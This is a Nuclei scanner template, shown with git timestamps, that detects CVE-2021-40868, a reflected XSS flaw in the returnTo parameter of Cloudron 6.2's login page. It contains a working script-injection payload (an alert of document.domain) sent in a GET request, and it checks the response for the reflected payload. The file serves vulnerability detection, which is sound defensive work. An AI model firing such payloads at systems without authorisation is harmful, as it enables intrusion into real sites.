nuclei-templates/cves/2021/CVE-2021-40868.yaml

33 lines
843 B
YAML
Raw Normal View History

2021-09-28 00:42:28 +00:00
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
author: daffainfo
severity: medium
2021-09-28 10:05:46 +00:00
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
2021-09-28 00:42:28 +00:00
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
2021-09-28 10:05:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
2021-09-28 00:42:28 +00:00
tags: cve,cve2021,xss,cloudron
requests:
- method: GET
path:
2021-09-28 10:05:46 +00:00
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-28 00:42:28 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
2021-09-28 10:05:46 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-28 00:42:28 +00:00
part: body